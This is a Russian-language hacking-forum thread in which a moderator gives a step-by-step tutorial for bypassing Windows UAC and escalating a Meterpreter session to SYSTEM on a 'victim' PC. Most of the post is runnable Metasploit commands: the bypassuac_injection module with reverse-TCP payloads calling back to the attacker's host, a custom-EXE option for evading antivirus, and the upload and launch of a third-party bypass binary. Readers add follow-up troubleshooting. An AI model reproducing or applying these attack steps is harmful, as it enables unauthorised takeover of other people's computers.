Bypass UAC. Metasploit.

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 2 сен 2016.

Наш партнер Genesis Hackspace
  1. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    510
    Симпатии:
    809
    Всем привет! В этой статье я бы хотел описать один важный прием в работе с Meterpreter’ом. А в частности:

    Способ повышения привилегий до системных, обход UAC на удаленном компьютере (жертве).

    В этой статье будет описано два таких способа. Оба успешно проверены на операционных системах - Windows 8.1, Windows 10.
    Итак, по порядку – UAC и привилегии.
    Если коротко, то UAC Контроль учетных записей пользователей – это функция, которая появилась еще в Windows Vista с тех пор «окна» она не покидает и только совершенствуется, ее цель предотвратить несанкционированные изменения в системных файлах компьютера. UAC обеспечивает защиту, запрашивая разрешение или пароль администратора перед совершением потенциально опасных для компьютера действий или при изменении параметров, которые могут оказать влияние на работу других пользователей.

    Видим работу UAC мы в следующем:
    Bypass UAC. Metasploit.

    Это помешает нам в полной мере ощутить власть над ПК жертвы, т.к. права у нас весьма ограничены. Подключившись к удаленному компьютеру с активным UAC (как это сделать, описано в первой части - https://codeby.net/forum/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/) вводим команду:

    > getsystem

    На что получаем ошибку с таким содержанием:
    Bypass UAC. Metasploit.

    Приступаем к осуществлению задуманного. Пишем:

    > background

    > use exploit/windows/local/bypassuac_injection

    > options

    Видим список опций, затем выставляем:

    > set target 1 (
    разрядность атакуемой системы, 1 – х64)

    > set LPORT 4444 (
    не обязательно 4444)

    > set session 1 (
    номер сессии)

    > set LHOST 172.16.XXX.XXX (свой IP)

    > set payload windows/x64/meterpreter/reverse_tcp (
    используем х64 версию meterpreter)

    > exploit

    Bypass UAC. Metasploit.

    Команда успешно отрабатывает и мы видим открывшуюся сессию под номером 2, уже с системными привилегиями.

    Bypass UAC. Metasploit.


    Дальнейшие действия уже зависят от нашей фантазии)

    Так же хочу заметить один момент, более продвинутые пользователи Metasploit, наверняка в курсе, что генерированный фреймворком пайлоад не самый лучший вариант, т.к. антивирусы не дремлют и рано или поздно он придет в негодность. Поэтому я хочу обратить внимание на интересную опцию EXE::Custom в данном эксплоите. В подобных этому, она тоже присутствует. Ее задача, указать НАШ .exe файл в качестве исполняемого пайлоада. Пример использования опции:

    > show advanced

    > set EXE::Custom /root/наш файл

    > exploit

    Ниже, во втором способе, речь пойдет примерно о таком способе.

    Способ номер 2
    .

    Эта технология описывает запуск на удаленном компьютере, стороннего файла с полезной нагрузкой. Базовые привилегии позволяют нам загрузить файлы в некоторые директории на нем.

    Скачиваем файл с нагрузкой TpmInit UACBypass отсюда - https://github.com/Cn33liz/TpmInitUACBypass/releases/tag/v1.0

    В открытом терминале с meterpreter пишем:

    > upload /root/Desktop/TpmIniyUACBypass.exe d:\\

    Где,

    upload ->
    используется для загрузки файла.

    /root/Desktop/TpmIniyUACBypass.exe
    -> путь к файлу.

    d:\\ ->
    локация куда будет загружен файл.

    Bypass UAC. Metasploit.

    Затем открываем второе окно с Metasploit и вводим следующее:

    > use exploit/multi/handler

    > set payload windows/x64/meterpreter/reverse_tcp

    > set lhost 102.168.0.XXX

    > set lport 4XXX

    > exploit

    Возвращаемся в предыдущее окно:

    > shell

    > d: (переходим туда, куда мы скопировали файл)

    > TpmInitUACBypass.exe 192.168.0.ХХХ:4444 msf (запускаем файл)

    Bypass UAC. Metasploit.

    Видим, что все прошло успешно, открылась сессия с системными привилегиями. Предыдущее окно можно закрывать.
    На этом все. Вопросы и поправки жду в комментариях.
    Спасибо за внимание.
     
    K-ON.I LOVE HENTAI, Mixa, ~~DarkNode~~ и 4 другим нравится это.
  2. Kareon07

    Kareon07 Active Member

    Регистрация:
    16 янв 2017
    Сообщения:
    29
    Симпатии:
    4
    Выдало при первом варианте:
    [-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module

    Уточните, пользователь у которого был загружен shell, должен быть в группе admin???
     
  3. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    510
    Симпатии:
    809
    Да, верно
     
  4. Kareon07

    Kareon07 Active Member

    Регистрация:
    16 янв 2017
    Сообщения:
    29
    Симпатии:
    4
    Подскажите, пожалуйста.Есть возможность на данный момент для ОС Windows Vista/7 повышения привилегий с USER до SYSTEM ?
     
  5. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    510
    Симпатии:
    809
Загрузка...
Похожие Темы - Bypass UAC Metasploit
  1. SooLFaa
    Ответов:
    11
    Просмотров:
    727
  2. cacaocaca

    Проблема How bypass virustotal Scan

    cacaocaca, 17 дек 2016, в разделе: Kali Linux
    Ответов:
    3
    Просмотров:
    125
  3. bratan
    Ответов:
    0
    Просмотров:
    1.731

Поделиться этой страницей